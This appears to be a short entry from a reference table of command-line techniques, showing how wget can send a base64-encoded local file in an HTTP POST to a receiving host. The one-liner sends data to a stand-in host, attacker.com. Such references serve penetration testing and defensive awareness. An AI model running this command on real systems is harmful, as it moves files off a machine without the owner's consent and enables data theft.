| description |
code |
| Send base64-encoded local file via "d" parameter of a HTTP POST request. Run an HTTP service to collect the file on the other end. |
export URL=http://attacker.com/
export LFILE=file_to_send
wget --post-data="d=$(base64 $LFILE | tr -d '\n')" $URL
|
|
|
|